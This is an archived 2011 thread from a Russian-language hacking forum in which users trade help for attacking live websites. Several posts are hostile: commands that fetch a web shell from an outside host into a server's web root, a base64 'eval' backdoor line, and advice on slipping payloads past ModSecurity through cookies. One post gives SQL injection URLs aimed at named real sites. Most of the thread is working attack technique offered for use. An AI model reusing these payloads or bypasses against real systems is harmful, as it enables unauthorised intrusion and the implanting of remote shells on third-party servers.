ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.03.2011, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 191387
Репутация:
6
|
|
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
Сообщение от None
Method Not Implemented
GET to /forum/profile.php not supported.
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
Сообщение от None
Not Found
The requested URL /forum/profile.php was not found on this server.
через GET и POST пробовал
|
|
|
|

17.03.2011, 14:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от noviyuser
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
пробуй курлом
curl http://site.com/shell.php > /var/www/html/shell.php
|
|
|

17.03.2011, 18:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 23579
Репутация:
-5
|
|
Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "/home/site.ru/docs/news/news/(тут все что хочу)"
можно как-то читать файлы и т д?
|
|
|
|

17.03.2011, 19:03
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Не выйдет ничего. Если файл, который ты хочешь прочитать некорректный xml(а он, разумеется, будет некорректным ), то получишь false
http://www.spravkaweb.ru/php/datafun/xml/simplexml/simplexml_load_file
|
|
|

17.03.2011, 20:02
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от noviyuser
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Была как-то такая же проблема решилась, так:
eval( base64_decode($_POST[cmd])); =>> cmd = c3lzdGVtKCdscyAtbGEnKTs= system('ls -la');
А ты уверен, кстати, что wget есть? Проверь так: which wget
|
|
|

18.03.2011, 03:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 28895
Репутация:
4
|
|
Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ
Сообщение от None
does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.
Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
|
|
|
|

18.03.2011, 05:13
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от noviyuser
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
|
|
|

18.03.2011, 05:17
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от Lijzer
Lijzer said:
Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения.
http://www.ptsecurity.ru/download/modrewrite_search.zip
|
|
|

18.03.2011, 07:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 191387
Репутация:
6
|
|
Сообщение от Redwood
Redwood said:
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
спасибо а можно примерчик?
|
|
|
|

18.03.2011, 13:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 8829
Репутация:
-3
|
|
Не могу понять как в этом примере вывести information_schema
http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+
и вот еще
http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'
при выводе information_schema, ошибка
Заранее спс
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|